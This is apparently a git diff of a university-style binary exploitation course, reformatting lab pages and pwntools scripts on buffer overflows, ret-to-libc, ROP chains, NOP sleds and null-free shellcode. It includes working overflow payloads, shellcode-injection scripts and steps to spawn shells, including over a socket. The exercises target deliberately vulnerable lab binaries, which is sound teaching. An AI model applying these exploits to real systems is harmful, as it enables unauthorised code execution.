permissions for the stack area. +The auth binary requires the `libssl1.0.0:i386` Debian package to work. +You can find `libssl1.0.0:i386` Debian package [here](https://packages.debian.org/jessie/i386/libssl1.0.0/download). -First, let's check that *NX* bit we mentioned earlier: -``` +First, let's check that `NX` bit we mentioned earlier: + +```console $ checksec auth [...] NX: NX enabled @@ -867,27 +802,27 @@ $ checksec auth ``` For completeness, lets check that there is indeed a buffer (stack) overflow vulnerability. -``` -$ python2.7 -c 'print "A" * 1357' | ltrace -i ./auth -TODO -``` -Check the source file - the buffer length is 1337 bytes. There should be a base -pointer and the `main()`'s return address just before it on the stack. There is -also some alignment involved, but we can easily try a few lengths to get the -right position of the return address. Seems to be 1337 + 16 followed by the -return address for this case. You can, of course, determine the distance between -the buffer's start address and the frame's return address exactly using objdump, -but we will leave that as an exercise. - -We can now jump anywhere. Unfortunately, we cannot put a shellcode in the buffer -and jump into it because the stack is non-executable now. Lets try it with a few -`NOP`s. Our buffer's address is `0xbfffee63` (see the `gets()` call). +```console +python2.7 -c 'print "A" * 1357' | ltrace -i ./auth ``` + +Check the source file - the buffer length is 1337 bytes. +There should be a base pointer and the `main()`'s return address just before it on the stack. +There is also some alignment involved, but we can easily try a few lengths to get the right position of the return address. +Seems to be 1337 + 16 followed by the return address for this case. +You can, of course, determine the distance between the buffer's start address and the frame's return address exactly using objdump, but we will leave that as an exercise. + +We can now jump anywhere. +Unfortunately, we cannot put a shellcode in the buffer and jump into it because the stack is non-executable now. +Lets try it with a few `NOP`s. +Our buffer's address is `0xbfffee63` (see the `gets()` call). + +```console $ python2.7 -c 'print "\x90\x90\x90\x90" + "A" * 1349 + "\x63\xee\xff\xbf"' | ltrace -i ./auth [0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 [0x8048601] malloc(20) = 0x0804b008 -[0x80485df] puts("Enter password: "Enter password: +[0x80485df] puts("Enter password: "Enter password: ) = 17 [0x80485ea] gets(0xbfffee63, 0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7) = 0xbfffee63 [0x8048652] memset(0x0804b008, '\000', 20) = 0x0804b008 @@ -896,9 +831,12 @@ $ python2.7 -c 'print "\x90\x90\x90\x90" + "A" * 1349 + "\x63\xee\xff\xbf"' | lt [0xffffffff] +++ killed by SIGSEGV +++ ``` -Guess what? It didn't work... How about we try to jump to some existing code? +Guess what? +It didn't work. +How about we try to jump to some existing code? First, let's take a look at the `check_password()` function. -``` + +```console $ objdump -M intel -d auth | grep -A 15 ":" 080485ec : 80485ec: 55 push ebp @@ -919,9 +857,10 @@ $ objdump -M intel -d auth | grep -A 15 ":" ``` Lets try `0x804860f` such that we print the `malloc` failure message. -``` + +```console $ python2.7 -c 'print "A" * 1353 + "\x0f\x86\x04\x08"' | ltrace -i -e puts ./auth -[0x80485df] puts("Enter password: "Enter password: +[0x80485df] puts("Enter password: "Enter password: ) = 17 [0x804861b] puts("malloc failed"malloc failed ) = 14 @@ -929,70 +868,66 @@ $ python2.7 -c 'print "A" * 1353 + "\x0f\x86\x04\x08"' | ltrace -i -e puts ./aut ``` ### 02. Challenge - ret-to-libc -So far, so good! Now let's get serious and do something useful with this. -Continue working in the `01-tutorial-ret-to-libc/` folder in the activities -archive. +So far, so good! +Now let's get serious and do something useful with this. + +Continue working in the `01-tutorial-ret-to-libc/` folder in the activities archive. + +The final goal of this task is to bypass the NX stack protection and call `system("/bin/sh")`. +We will start with a simple `ret-to-plt`: -The final goal of this task is to bypass the NX stack protection and call -`system("/bin/sh")`. We will start with a simple ret-to-plt: 1. Display all libc functions linked with the auth binary. -2. Return to `puts()`. Use ltrace to show that the call is actually being made. -3. Find the offset of the `"malloc failed"` static string in the binary. -4. Make the binary print `"failed"` the second time `puts()` is called. -5. **(bonus)** The process should SEGFAULT after printing `Enter password:` -again. Make it exit cleanly (the exit code does not matter, just no `SIGSEGV`). -You can move on to the next task without solving this problem. -6. Remember how we had ASLR disabled? The other libc functions are in the -memory, you just need to find their addresses. Find the offset of `system()` in -libc. Find the offset of the `"/bin/sh"` string in libc. -7. Where is libc linked in the auth binary? Compute the final addresses and call -`system("/bin/sh")` just like you did with `puts()`. - -
- Hint 1 -Use LD_TRACE_LOADED_OBJECTS=1 ./auth instead of ldd. -The latter is not always reliable, because the order in which it loads the -libraries might be different than when you actually run the binary. -
- -
- Hint 2 -When you finally attack this, stdin will get closed and the new -shell will have nothing to read. Use cat to concatenate your attack -string with stdin like this: -cat <(python -c 'print “L33T_ATTACK”') - | ./vulnbinary. - -Note the use of the - (dash) character before the | -(pipe). This prevents the closing of the input file descriptor of the pipe when -cat's output finished (i.e. when the EOF character is -received). -
+1. Return to `puts()`. + Use ltrace to show that the call is actually being made. +1. Find the offset of the `"malloc failed"` static string in the binary. +1. Make the binary print `"failed"` the second time `puts()` is called. +1. **(bonus)** The process should SEGFAULT after printing `Enter password:` again. + Make it exit cleanly (the exit code does not matter, just no `SIGSEGV`). + You can move on to the next task without solving this problem. +1. Remember how we had ASLR disabled? + The other libc functions are in the memory, you just need to find their addresses. + Find the offset of `system()` in libc. + Find the offset of the `"/bin/sh"` string in libc. +1. Where is libc linked in the auth binary? + Compute the final addresses and call `system("/bin/sh")` just like you did with `puts()`. + +**Hint 1**: +Use `LD_TRACE_LOADED_OBJECTS=1 ./auth` instead of `ldd`. +The latter is not always reliable, because the order in which it loads the libraries might be different than when you actually run the binary. + +**Hint 2**: +When you finally attack this, `stdin` will get closed and the new shell will have nothing to read. +Use `cat` to concatenate your attack string with `stdin` like this: + +```console +`cat <(python -c 'print "L33T_ATTACK"') - | ./vulnbinary`. +``` + +Note the use of the `-` (dash) character before the `|` (pipe). +This prevents the closing of the input file descriptor of the pipe when `cat`'s output finished (i.e. when the `EOF` character is received). ### 03. Challenge - no-ret-control -Go to the -[03-challenge-no-ret-control/](/activities/03-challenge-no-ret-control/src) -folder in the activities archive. -Imagine this scenario: we have an executable where we can change at least 4 -bytes of random memory, but ASLR is turned on. We cannot reliably change the -value of the return address because of this. Sometimes `ret` is not even called -at the end of a function. +Go to the [03-challenge-no-ret-control/](/activities/03-challenge-no-ret-control/src) folder in the activities archive. + +Imagine this scenario: we have an executable where we can change at least 4 bytes of random memory, but ASLR is turned on. +We cannot reliably change the value of the return address because of this. +Sometimes `ret` is not even called at the end of a function. Alter the execution of `force_exit`, in order to call the secret function. ### 04. Challenge - ret-to-plt -Go to the [04-challenge-ret-to-plt/](/activities/04-ret-to-plt/src) folder in -the activities archive. + +Go to the [04-challenge-ret-to-plt/](/activities/04-ret-to-plt/src) folder in the activities archive. `random` is a small application that generates a random number. -Your task is to build an exploit that makes the application always print the -same second random number. That is the first printed random number is whatever, -but the second printed random number will always be the same, for all runs. In -the sample output below the second printed random number is always `1023098942` -for all runs. -``` +Your task is to build an exploit that makes the application always print the same second random number. +That is the first printed random number is whatever, but the second printed random number will always be the same, for all runs. +In the sample output below the second printed random number is always `1023098942` for all runs. + +```console hari@solyaris-home:~$ python2.7 -c 'print ' | ./random Hi! Options: 1. Get random number @@ -1017,35 +952,36 @@ Here's a random number: 1023098942. Have fun with it! You can use the Python skeleton given in section [NOP Analogy](#nop-analogy) for the buffer overflow input. -**Bonus:** The process should SEGFAULT after printing the second (constant) -number. Make it exit cleanly (the exit code does not matter, just no `SIGSEGV`). +**Bonus:** The process should SEGFAULT after printing the second (constant) number. +Make it exit cleanly (the exit code does not matter, just no `SIGSEGV`). ### 05. Challenge - gadget tutorial -This task requires you to construct a payload using gadgets and calling the -functions inside such that it will print -``` + +This task requires you to construct a payload using gadgets and calling the functions inside such that it will print + +```text Hello! stage A!stage B! ``` Make it also print the messages in reverse order: -``` + +```text Hello! stage B!stage A! ``` ### 06. Bonus Challenge - Echo service +This task is a network service that can be exploited. +Run it locally and try to exploit it. +You'll find that if you call `system("/bin/sh")` the shell is opened in the terminal where the server was started instead of the one where the attack takes place. +This happens because the client-server communication takes place over a socket. +When you spawn a shell it will inherit the Standard I/O descriptors from the parent and use those. +To fix this you need to redirect the socket fd into 0,1 (and optionally 2). -This task is a network service that can be exploited. Run it locally and try to -exploit it. You'll find that if you call `system("/bin/sh")` the shell is opened -in the terminal where the server was started instead of the one where the attack -takes place. This happens because the client-server communication takes place -over a socket. When you spawn a shell it will inherit the Standard I/O -descriptors from the parent and use those. To fix this you need to redirect the -socket fd into 0,1 (and optionally 2). +So you will need to do the equivalent of the following, as part of a `ROP` chain: -So you will need to do the equivalent of the following, as part of a ROP chain: ```c dup2(sockfd, 1); dup2(sockfd, 0); @@ -1054,12 +990,10 @@ system("/bin/sh"); Exploit it first with ASLR disabled and then with it enabled. - ## Conclusions + At the end of this session, you should: -- Understand the limitations of classic buffer overflow attacks, as well as -shellcodes. -- Understand and visualise the effect of various simple ROP attacks on a -program's stack -- Be able to craft and make use of ROP chains in order to hack vulnerable -binaries + +- Understand the limitations of classic buffer overflow attacks, as well as shellcodes. +- Understand and visualise the effect of various simple `ROP` attacks on a program's stack +- Be able to craft and make use of `ROP` chains in order to hack vulnerable binaries diff --git a/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/exploit.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/exploit.py index a24ec11..3279f74 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/exploit.py +++ b/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/exploit.py @@ -17,10 +17,13 @@ shellcode = asm(shellcode_asm) print(len(shellcode)) -io = gdb.debug(BIN, gdbscript=""" +io = gdb.debug( + BIN, + gdbscript=""" break vuln.c:9 continue - """) + """, +) str_addr = io.recvline().strip(b"\n") addr = int(str_addr, 16) @@ -28,7 +31,7 @@ # Inject and trigger payload = b"" payload += shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) diff --git a/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/script.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/script.py index 4024dc8..570c486 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/script.py +++ b/chapters/exploitation-techniques/shellcodes-advanced/drills/01-tutorial-avoiding-overwriting/src/script.py @@ -17,7 +17,7 @@ print(len(shellcode)) payload = shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) diff --git a/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/exploit.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/exploit.py index 5f3ee2b..6347a08 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/exploit.py +++ b/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/exploit.py @@ -11,7 +11,7 @@ offset = 0x800 # Determined with gdb -addr = 0x7fffffffce30 +addr = 0x7FFFFFFFCE30 nop_sled = "" # nop_sled += "NOP\n" * 0x600 @@ -23,7 +23,7 @@ # Inject and trigger payload = b"" payload += shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) diff --git a/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/script.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/script.py index 9173066..8032375 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/script.py +++ b/chapters/exploitation-techniques/shellcodes-advanced/drills/02-tutorial-nop-sleds/src/script.py @@ -3,7 +3,7 @@ context.binary = "./vuln" -addr = 0x7fffffffcce0 + 500 +addr = 0x7FFFFFFFCCE0 + 500 # 0x7fffffffcdc0 offset = 0x800 @@ -16,11 +16,8 @@ print(len(shellcode)) payload = shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) io.send(payload) io.interactive() - - - diff --git a/chapters/exploitation-techniques/shellcodes-advanced/drills/03-tutorial-null-free-shellcode/src/exploit.py b/chapters/exploitation-techniques/shellcodes-advanced/drills/03-tutorial-null-free-shellcode/src/exploit.py index 61a7237..1a61b7b 100755 --- a/chapters/exploitation-techniques/shellcodes-advanced/drills/03-tutorial-null-free-shellcode/src/exploit.py +++ b/chapters/exploitation-techniques/shellcodes-advanced/drills/03-tutorial-null-free-shellcode/src/exploit.py @@ -56,10 +56,13 @@ # shellcode = asm(nullfree_shellcode_asm) shellcode = b"AAAAAAAAAAA" -io = gdb.debug(BIN, gdbscript=""" +io = gdb.debug( + BIN, + gdbscript=""" break vuln.c:12 continue - """) + """, +) str_addr = io.recvline().strip(b"\n") addr = int(str_addr, 16) @@ -67,7 +70,7 @@ # Inject and trigger payload = b"" payload += shellcode -payload += (offset + 8 - len(shellcode)) * b'A' +payload += (offset + 8 - len(shellcode)) * b"A" payload += pack(addr) payload += b"\n" diff --git a/chapters/exploitation-techniques/shellcodes-advanced/reading/README.md b/chapters/exploitation-techniques/shellcodes-advanced/reading/README.md index 2f719a8..71a2eda 100644 --- a/chapters/exploitation-techniques/shellcodes-advanced/reading/README.md +++ b/chapters/exploitation-techniques/shellcodes-advanced/reading/README.md @@ -1,46 +1,31 @@ ---- -linkTitle: Shellcodes Advanced -type: docs -weight: 10 ---- +# Shellcodes (Advanced) -
- Table of contents - - * [Introduction](#introduction) - * [Tutorials](#tutorials) - * [01. Tutorial: preventing stack operations from overwriting the shellcode](#01-tutorial-preventing-stack-operations-from-overwriting-the-shellcode) - * [02. Tutorial: NOP sleds](#02-tutorial-nop-sleds) - * [03. Tutorial: null-free shellcodes](#03-tutorial-null-free-shellcodes) - * [04. Tutorial: shellcodes in pwntools](#04-tutorial-shellcodes-in-pwntools) - * [05. Tutorial: alphanumeric shellcode](#05-tutorial-alphanumeric-shellcode) - * [Challenges](#challenges) - * [06. Challenge: NOP sled redo](#06-challenge-nop-sled-redo) - * [07. Challenge: No NOPs allowed!](#07-challenge-no-nops-allowed) - * [08. Challenge: multiline output](#08-challenge-multiline-output) - * [09: Challenge: execve blocking attempt](#09-challenge-execve-blocking-attempt) - * [Further Reading](#further-reading) - * [Input restrictions](#input-restrictions) +In [the "Shellcodes" session](../../shellcodes/reading), we learned about **shellcodes**, a form of **code injection** which allowed us to hijack the control flow of a process and make it do our bidding. -
+## Introduction -# Introduction +The three steps for a successful shellcode attack are: -In [the previous session](../shellcodes), we learned about **shellcodes**, a form of **code injection** which allowed us to hijack the control flow of a process and make it do our bidding. The three steps for a succesful shellcode attack are: +- **develop**: obtain the machine code for the desired functionality +- **inject**: place the shellcode into the process' address space +- **trigger**: divert control flow to the beginning of our shellcode - * **develop**: obtain the machine code for the desired functionality - * **inject**: place the shellcode into the process' address space - * **trigger**: divert control flow to the beginning of our shellcode +The first step seems pretty straightforward, but there are a lot of things that could go wrong with the last two. +For example, we cannot inject a shellcode in a process that doesn't read input or reads very little (though remember that if we can launch the target program we can place the shellcode inside its environment or command line arguments); +we cannot trigger our shellcode if we cannot overwrite some code-pointer (e.g. +a saved return) or if we do not know the precise address at which it ends up in the process' memory and we cannot use such an attack if there isn't some memory region where we have both write and execute permissions. -The first step seems pretty straightforward, but there are a lot of things that could go wrong with the last two. For example, we cannot inject a shellcode in a process that doesn't read input or reads very little (though remember that if we can launch the target program we can place the shellcode inside its environment or command line arguments); we cannot trigger our shellcode if we cannot overwrite some code-pointer (e.g. a saved return) or if we do not know the precise address at which it ends up in the process' memory and we cannot use such an attack if there isn't some memory region where we have both write and execute permissions. +Some of these hurdles can occur naturally, while others are intentionally created as preventive measures (e.g. +on modern platforms, any memory area can be either writable or executable, but not both, a concept known as [W^X](https://en.wikipedia.org/wiki/W%5EX)). +Anyway, it is useful to think about these problems and how to work around them, then put that knowledge into practice. -Some of these hurdles can occur naturally, while others are intentionally created as preventive measures (e.g. on modern platforms, any memory area can be either writable or executable, but not both, a concept known as [W^X](https://en.wikipedia.org/wiki/W%5EX)). Anyway, it is useful to think about these problems and how to work around them, then put that knowledge into practice. +## Tutorials -# Tutorials +### 01. Tutorial: preventing stack operations from overwriting the shellcode -## 01. Tutorial: preventing stack operations from overwriting the shellcode - -When performing a shellcode attack we often needed to write some stuff in memory so that it has a valid address. For example, to perform an `execve("/bin/sh", ["/bin/sh", NULL], NULL)` syscall, we need to place the string `"/bin/sh"` in memory and fill the `rdi` register (first argument of a syscall) with that address. In theory we could write it in any writable area but, as you might have noticed in the previous session, it's usually simpler to just use the stack. +When performing a shellcode attack we often needed to write some stuff in memory so that it has a valid address. +For example, to perform an `execve("/bin/sh", ["/bin/sh", NULL], NULL)` syscall, we need to place the string `"/bin/sh"` in memory and fill the `rdi` register (first argument of a syscall) with that address. +In theory we could write it in any writable area but, as you might have noticed in the previous session, it's usually simpler to just use the stack. ```asm mov rax, `/bin/sh` @@ -58,36 +43,49 @@ results in fewer machine-code bytes than: plus, `push`-ing has the side effect of placing our address in the `rsp` register which we could later `mov` somewhere else, avoiding the need of explicitly referring to some address (which might be difficult to predict, or even random, in the case of ASLR). -In cases where our shellcode is also injected on the stack this leads to the complicated situation in which the stack serves as both a code and data region. If we aren't careful, our data pushes might end up overwriting the injected code and ruining our attack. +In cases where our shellcode is also injected on the stack this leads to the complicated situation in which the stack serves as both a code and data region. +If we aren't careful, our data pushes might end up overwriting the injected code and ruining our attack. -Run `make` then use the `exploit.py` script (don't bother with how it works, for now); it will create a shellcode, pad it and feed it to the program, then open a new terminal window with a `gdb` instance breaked at the end of the `main` function. You can then explore what happens step by step and you will notice that, as the shellcode pushes the data it needs onto the stack it eventually comes to overwrite itself, resulting in some garbage. +Run `make` then use the `exploit.py` script (don't bother with how it works, for now); +it will create a shellcode, pad it and feed it to the program, then open a new terminal window with a `gdb` instance breaked at the end of the `main` function. +You can then explore what happens step by step and you will notice that, as the shellcode pushes the data it needs onto the stack it eventually comes to overwrite itself, resulting in some garbage. -The problem is that, after executing `ret` at the end of `main` and getting hijacked to jump to the beginning of our shellcode, `rip` ends up at `0x7ffca44f2280`, while `rsp` ends up at `0x7ffca44f22c0` (addresses on your machine will probably differ). The instruction pointer is only 64 bytes **below** the stack pointer. +The problem is that, after executing `ret` at the end of `main` and getting hijacked to jump to the beginning of our shellcode, `rip` ends up at `0x7ffca44f2280`, while `rsp` ends up at `0x7ffca44f22c0` (addresses on your machine will probably differ). +The instruction pointer is only 64 bytes **below** the stack pointer. - * as instructions get executed, the instruction pointer is *incremented* - * as values are pushed onto the stack, the stack pointer is *decremented* +- as instructions get executed, the instruction pointer is incremented +- as values are pushed onto the stack, the stack pointer is decremented -Thus the difference will shrink more and more with each instruction executed. The total length of the shellcode is 48 bytes so that means that after pushing 16 bytes onto the stack (64 - 48) any `push` will overwrite the end of our shellcode! +Thus the difference will shrink more and more with each instruction executed. +The total length of the shellcode is 48 bytes so that means that after pushing 16 bytes onto the stack (64 - 48) any `push` will overwrite the end of our shellcode! -One obvious solution is to try and modify our shellcode to make it shorter, or to make it push less data onto the stack; this might work in some situations, but it's not a general fix. +One obvious solution is to try and modify our shellcode to make it shorter, or to make it push less data onto the stack; +this might work in some situations, but it's not a general fix. -Remember that after the vulnerable function returns, we control the execution of the program; so we can control what happens to the stack! Then we'll simply move the top of the stack to give us some space by adding this as the first instruction to our shellcode: +Remember that after the vulnerable function returns, we control the execution of the program; +so we can control what happens to the stack! +Then we'll simply move the top of the stack to give us some space by adding this as the first instruction to our shellcode: ```asm sub rsp, 64 ``` -Now, right after jumping to our shellcode, `rip` and `rsp` will be the same, but they'll go on in opposite directions and everything will be well. Uncomment line 64 in `exploit.py`, run it again and see what happens. +Now, right after jumping to our shellcode, `rip` and `rsp` will be the same, but they'll go on in opposite directions and everything will be well. +Uncomment line 64 in `exploit.py`, run it again and see what happens. -If we're at the very low-edge of the stack and can't access memory below, we can use `add` to move the stack pointer way up, so that even if the pushed data comes towards our injected code, it will not reach it; after all, our shellcode is short and we're not pushing much. +If we're at the very low-edge of the stack and can't access memory below, we can use `add` to move the stack pointer way up, so that even if the pushed data comes towards our injected code, it will not reach it; +after all, our shellcode is short and we're not pushing much. -## 02. Tutorial: NOP sleds +### 02. Tutorial: NOP sleds -In the previous session, you probably had some difficulties with the [ninth task](../shellcodes#09-challenge-shellcode-after-saved-ret---no-leak), which asked you to perform a shellcode-on-stack attack without having a leak of the overflown buffer's address. You can determine it using `gdb` but, as you've seen, things differ between `gdb` and non-`gdb` environments; the problem is even worse if the target binary is running on a remote machine. +In the previous session, you probably had some difficulties with the 9th task in [the "Shellcodes" section](../../shellcodes/reading), which asked you to perform a shellcode-on-stack attack without having a leak of the overflown buffer's address. +You can determine it using `gdb` but, as you've seen, things differ between `gdb` and non-`gdb` environments; +the problem is even worse if the target binary is running on a remote machine. -The crux of the issue is the fact that we have to precisely guess **one** exact address where our shellcode begins. For example, our shellcode might end up looking like this in memory: +The crux of the issue is the fact that we have to precisely guess **one** exact address where our shellcode begins. +For example, our shellcode might end up looking like this in memory: -``` +```text 0x7fffffffce28: rex.WX adc QWORD PTR [rax+0x0],rax 0x7fffffffce2c: add BYTE PTR [rax],al 0x7fffffffce2e: add BYTE PTR [rax],al @@ -100,28 +98,33 @@ The crux of the issue is the fact that we have to precisely guess **one** exact The first instruction of our shellcode is the `push 0x68` at address `0x7fffffffce30`: - * if we jump before it, we'll execute some garbage interpreted as code; in the above example, missing it by two bytes would execute `add BYTE PTR [rax],al` which might SEGFAULT if `rax` doesn't happen to hold a valid writable address - * if we jump after it, we'll have a malformed `"/bin/sh"` string on the stack, so the later `execve` call will not work. +- if we jump before it, we'll execute some garbage interpreted as code; +in the above example, missing it by two bytes would execute `add BYTE PTR [rax],al` which might SEGFAULT if `rax` doesn't happen to hold a valid writable address +- if we jump after it, we'll have a malformed `"/bin/sh"` string on the stack, so the later `execve` call will not work. -Fortunately, we don't have to consider the entire address space, so our chances are better than 1 in 264: +Fortunately, we don't have to consider the entire address space, so our chances are better than 1 in $2^64$. - * the stack is usually placed at a fixed address (e.g. 0x7fffffffdd000), so we have a known-prefix several octets wide - * due to alignment concerns, the compiler emits code that places buffers and other local data at nice, rounded addresses (ending in `0`, or `c0`, `00` etc.), so we have a known-suffix several bits wide +- the stack is usually placed at a fixed address (e.g. +0x7fffffffdd000), so we have a known-prefix several octets wide +- due to alignment concerns, the compiler emits code that places buffers and other local data at nice, rounded addresses (ending in `0`, or `c0`, `00` etc.), so we have a known-suffix several bits wide On your local machine, using `gdb` to look at the buffer's address will then allow you to use just a bit of bruteforce search to determine the address outside of `gdb`. -But what if we could increase our chances to jump to the beginning of our shellcode? So that we don't have to guess **one** exact address, but just hit some address range? This is where "NOP sleds" come in. +But what if we could increase our chances to jump to the beginning of our shellcode? +So that we don't have to guess **one** exact address, but just hit some address range? +This is where "NOP sleds" come in. -A "NOP sled" is simply a string of `NOP` instructions added as a prefix to a shellcode. The salient features of a `NOP` instruction that make it useful for us are: +A "NOP sled" is simply a string of `NOP` instructions added as a prefix to a shellcode. +The salient features of a `NOP` instruction that make it useful for us are: - * it does nothing - * it's one byte long +- it does nothing +- it's one byte long Thus if we chain a bunch of these together and prepend them to our shellcode, we can jump inside the middle of the "NOP sled" at any position and it will be alright: each subsequent `NOP` instruction will be executed, doing nothing, then our shellcode will be reached. Our shellcode will end up looking like this in the process memory: -``` +```text 0x7fffffffd427: mov BYTE PTR [rax], al 0x7fffffffd429: nop 0x7fffffffd42a: nop @@ -135,22 +138,36 @@ Our shellcode will end up looking like this in the process memory: 0x7fffffffd43c: push rax ``` -Again, our first "useful" instruction is the `push 0x68` at `0x7fffffffd430`. Jumping after it and skipping its execution is still problematic, but notice that we can now jump **before** it, missing it by several bytes with no issue. If we jump to `0x7fffffffd42c` for example, we'll reach a `nop`, then execution will pass on to the next `nop` and so on; after executing 4 nops, our shellcode will be reached and everything will be as if we had jumped directly to `0x7fffffffd430` in the first place. There is now a continuous range of 8 addresses where it's ok to jump to. +Again, our first "useful" instruction is the `push 0x68` at `0x7fffffffd430`. +Jumping after it and skipping its execution is still problematic, but notice that we can now jump **before** it, missing it by several bytes with no issue. +If we jump to `0x7fffffffd42c` for example, we'll reach a `nop`, then execution will pass on to the next `nop` and so on; +after executing 4 nops, our shellcode will be reached and everything will be as if we had jumped directly to `0x7fffffffd430` in the first place. +There is now a continuous range of 8 addresses where it's ok to jump to. -But 8 is such a small number; the longer the NOP sled, the better our chances. The only limit is how much data we can feed into the program when we inject our shellcode. +But 8 is such a small number; +the longer the NOP sled, the better our chances. +The only limit is how much data we can feed into the program when we inject our shellcode. - * Run `make`, then inspect the `vuln` binary in `gdb` and determine the location of the vulnerable buffer. - * Modify line 14 of the `exploit.py` script with the address you've found, then run the script. Most likely, it will not work: the address outside of `gdb` is different. - * Uncomment line 17 of the script, then run it again. - * You should now have a shell! +- Run `make`, then inspect the `vuln` binary in `gdb` and determine the location of the vulnerable buffer. +- Modify line 14 of the `exploit.py` script with the address you've found, then run the script. +Most likely, it will not work: the address outside of `gdb` is different. +- Uncomment line 17 of the script, then run it again. +- You should now have a shell! -If this doesn't work, play a bit with the address left on line 14; increment it by 256, then decrement it by 256. You're aiming to get **below** the actual address at some offset smaller than the NOP sled length which, in this example, is 1536. +If this doesn't work, play a bit with the address left on line 14; +increment it by 256, then decrement it by 256. +You're aiming to get **below** the actual address at some offset smaller than the NOP sled length which, in this example, is 1536. -## 03. Tutorial: null-free shellcodes +### 03. Tutorial: null-free shellcodes -Up until now, all the vulnerable programs attacked used `read` as a method of getting the input. This allows us to feed them any string of arbitrary bytes. In practice, however, there are many cases in which the input is treated as a 0-terminated *string* and processed by functions like `strcpy`. +Up until now, all the vulnerable programs attacked used `read` as a method of getting the input. +This allows us to feed them any string of arbitrary bytes. +In practice, however, there are many cases in which the input is treated as a 0-terminated string and processed by functions like `strcpy`. -This means that our shellcode cannot contain a 0 byte because, as far as functions like `strcpy` are concerned, that signals the end of the input. However, shellcodes are likely to contain 0 bytes. For example, remember that we need to set `rax` to a value indicating the syscall we want; if we wish to `execve` a new shell, we'll have to place the value `59` in `rax`: +This means that our shellcode cannot contain a 0 byte because, as far as functions like `strcpy` are concerned, that signals the end of the input. +However, shellcodes are likely to contain 0 bytes. +For example, remember that we need to set `rax` to a value indicating the syscall we want; +if we wish to `execve` a new shell, we'll have to place the value `59` in `rax`: ```asm mov rax, 0x3b @@ -158,21 +175,30 @@ This means that our shellcode cannot contain a 0 byte because, as far as functio Due to the nature of x86 instructions and the size of the `rax` register, that `0x3b` might be considered an 8-byte wide constant, yielding the following machine code: `48 b8 59 00 00 00 00 00 00 00`. -As you can see, there are quite a lot of zeroes. We could get rid of them if we considered `0x3b` to be a 1-byte wide constant; unfortunately there's no instruction to place into `rax` an immediate 1-byte value. However, there is an instruction to place an immediate 1-byte value in `al`, the lowest octet of `rax`. But we need the other seven octets to be 0... Fortunately, we can do a trick by xor-ing the register with itself! This will make every bit 0, plus the `xor` instruction itself doesn't contain 0 bytes. So we can replace the code above with: +As you can see, there are quite a lot of zeroes. +We could get rid of them if we considered `0x3b` to be a 1-byte wide constant; +unfortunately there's no instruction to place into `rax` an immediate 1-byte value. +However, there is an instruction to place an immediate 1-byte value in `al`, the lowest octet of `rax`. +But we need the other seven octets to be 0... +Fortunately, we can do a trick by xor-ing the register with itself! +This will make every bit 0, plus the `xor` instruction itself doesn't contain 0 bytes. +So we can replace the code above with: ```asm xor rax, rax mov al, 0x3b ``` -Which assembles to `48 31 c0 b0 3b`. Not only are there no 0 bytes, we've also reduced the size of the code! +Which assembles to `48 31 c0 b0 3b`. +Not only are there no 0 bytes, we've also reduced the size of the code! Takeaways: - * xor-ing a register with itself is a good way of obtaining some zeroes in memory without using zeroes in machine code - * working with the lower parts of registers avoids immediate values with leading-zeroes +- xor-ing a register with itself is a good way of obtaining some zeroes in memory without using zeroes in machine code +- working with the lower parts of registers avoids immediate values with leading-zeroes -We can apply these insights in other situations to avoid zeroes in our code. For example, instead of +We can apply these insights in other situations to avoid zeroes in our code. +For example, instead of ```asm mov rax, `/bin/sh\0` @@ -190,13 +216,19 @@ We can write: Note that extra-slashes in a path don't make any difference. -The `vuln.c` program reads data properly into a buffer, then uses `strcpy` to move data into a smaller buffer, resulting in an overflow. Run `make`, then the `exploit.py` script; just like before, it will start a new terminal window with a `gdb` instance in which you can explore what happens. The attack will fail because the injected shellcode contains 0 bytes so `strcpy` will only stop copying well before the end of the shellcode. +The `vuln.c` program reads data properly into a buffer, then uses `strcpy` to move data into a smaller buffer, resulting in an overflow. +Run `make`, then the `exploit.py` script; +just like before, it will start a new terminal window with a `gdb` instance in which you can explore what happens. +The attack will fail because the injected shellcode contains 0 bytes so `strcpy` will only stop copying well before the end of the shellcode. -Comment line 55 and uncomment line 56, replacing the shellcode with a null-free version. Run `exploit.py` again. It should work! - -## 04. Tutorial: shellcodes in pwntools +Comment line 55 and uncomment line 56, replacing the shellcode with a null-free version. +Run `exploit.py` again. +It should work! -Once again, `pwntools` can come to our aid and help us with shellcode attacks. The most useful feature for this is the [shellcraft module](https://docs.pwntools.com/en/stable/shellcraft.html) which offers prebuilt shellcodes for various architectures. +### 04. Tutorial: shellcodes in pwntools + +Once again, `pwntools` can come to our aid and help us with shellcode attacks. +The most useful feature for this is the [shellcraft module](https://docs.pwntools.com/en/stable/shellcraft.html) which offers prebuilt shellcodes for various architectures. For example, to obtain a shellcode which performs 